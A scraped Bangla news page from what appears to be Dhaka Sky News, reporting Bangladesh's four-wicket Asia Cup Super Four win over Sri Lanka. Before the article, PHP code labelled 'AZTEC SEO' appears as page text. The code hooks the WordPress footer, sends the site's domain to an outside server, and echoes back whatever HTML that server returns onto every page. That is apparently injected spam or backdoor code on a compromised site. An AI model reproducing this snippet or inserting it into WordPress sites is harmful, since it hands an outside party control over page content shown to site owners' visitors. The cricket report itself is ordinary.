/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); লঙ্কানদের হারিয়ে সুপার ফোর শুরু করল বাংলাদেশ | Dhaka Sky News

মন্ত্রণালয়গুলোর অভ্যন্তরীণ সংস্কারের তথ্য জনগণকে জানানোর নির্দেশ

আগের সংবাদ

সামনের দিনগুলো ভালো নয়, সজাগ থাকুন : তারেক রহমান

পরের সংবাদ

লঙ্কানদের হারিয়ে সুপার ফোর শুরু করল বাংলাদেশ

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: September 21, 2025 , 11:13 am

টাইগারদের ম্যাচ জেতার জন্য শেষ ওভারে দরকার ছিল ৫ রান। দাসুন শানাকার প্রথম বলেই বাউন্ডারি হাঁকিয়ে রানে সমতা আনেন জাকের আলী। ম্যাচ হয়ে গেছে টাই। পাঁচ বলে তখন মাত্র ১ রানই দরকার। এরপর টানা দুই উইকেট হারিয়ে চাপ বাড়ে বাংলাদেশ শিবিরে। একে একে বিদায় নেন জাকের ও শেখ মেহেদী। তবে পঞ্চম বলে কাঙ্ক্ষিত রানটি তুলে নেন নাসুম আহমেদ। তাতেই সুপার ফোরের প্রথম ম্যাচে শ্রীলঙ্কাকে ৪ উইকেটে হারিয়ে শুভসূচনা করল বাংলাদেশ।

শ্বাসরুদ্ধকর এই জয়ে এশিয়া কাপের ফাইনালের সমীকরণে এগিয়ে গেল বাংলাদেশ। সুপার ফোরে টাইগাররা পরবর্তী দুটি ম্যাচ খেলবে পাকিস্তান ও ভারতের বিপক্ষে। এর যেকোনও একটি ম্যাচ জিতলেও ফাইনালের সমীকরণ উজ্জ্বল হবে বাংলাদেশের।

টাইগাররা দুবাই আন্তর্জাতিক স্টেডিয়ামে শ্রীলঙ্কার দেওয়া ১৬৯ রানের লক্ষ্যে ব্যাট করতে নামে। শুরুতেই দলীয় ১ রানে শূন্য হাতে ফিরে যান তানজিদ হাসান। এরপর লিটন দাসকে সঙ্গে নিয়ে চাপ সামলান সাইফ হাসান। ৩৪ বলে ৫৯ রানের জুটি গড়েন তারা। ব্যক্তিগত ২৩ রানে ফেরেন লিটন। তবে অন্যপ্রান্তে আক্রমণাত্মক ব্যাটিংয়ে ফিফটি তুলে নেন সাইফ। শেষ পর্যন্ত ৪৫ বলে ৬১ রান করে বিদায় নেন তিনি।

এরপর ব্যাট হাতে জ্বলে ওঠেন তাওহিদ হৃদয়। সাম্প্রতিক সময়ে ব্যাটিংয়ে খারাপ সময় কাটালেও এবার দলের প্রয়োজনেই খেলেন দায়িত্বশীল ইনিংস। ৩৭ বলে ৫৮ রানে থেমে যান তিনি। আন্তর্জাতিক টি–টোয়েন্টিতে নিজের চতুর্থ ফিফটি তুলে নেওয়ার পাশাপাশি স্পর্শ করেন এক হাজার রানের মাইলফলকও। শেষদিকে কিছুটা নাটকীয়তা তৈরি হলেও শামীম ও নাসুমে জয় নিয়েই মাঠ ছাড়ে বাংলাদেশ। এতে সুপার ফোর পর্বে আত্মবিশ্বাসী সূচনা হলো টাইগারদের।

টস হেরে ব্যাট করতে নেমে নির্ধারিত ২০ ওভারে ৬ উইকেটে ১৬৮ রান তোলেন লঙ্কানরা। ইনিংসের শুরুতে ঝড়ো ব্যাটিংয়ে দলকে এগিয়ে নেন কুশল মেন্ডিস ও পাথুম নিশাঙ্কা। তবে তাসকিন আহমেদ আঘাত হানেন প্রথমে, এরপর শেখ মেহেদী ফিরিয়ে দেন মেন্ডিস ও মিশরাকে। মাঝপথে লঙ্কানরা ব্যাটিংয়ে থমকে গেলেও শেষ দিকে দারুণ ঝড় তোলেন দাসুন শানাকা। ৩৭ বলে অপরাজিত ৬৪ রানের ইনিংসে ভর করে চ্যালেঞ্জিং সংগ্রহ পায় লঙ্কানরা। তাকে সঙ্গ দেন চারিথ আসালঙ্কা, ১২ বলে করেন ২১ রান। বাংলাদেশের হয়ে সেরা বোলার মুস্তাফিজুর রহমান ১৯ রানে নেন ৩ উইকেট। শেখ মেহেদীর ঝুলিতে গেছে ২টি।

২৪ সেপ্টেম্বর সুপার ফোরে বাংলাদেশের দ্বিতীয় ম্যাচে প্রতিপক্ষ ভারত।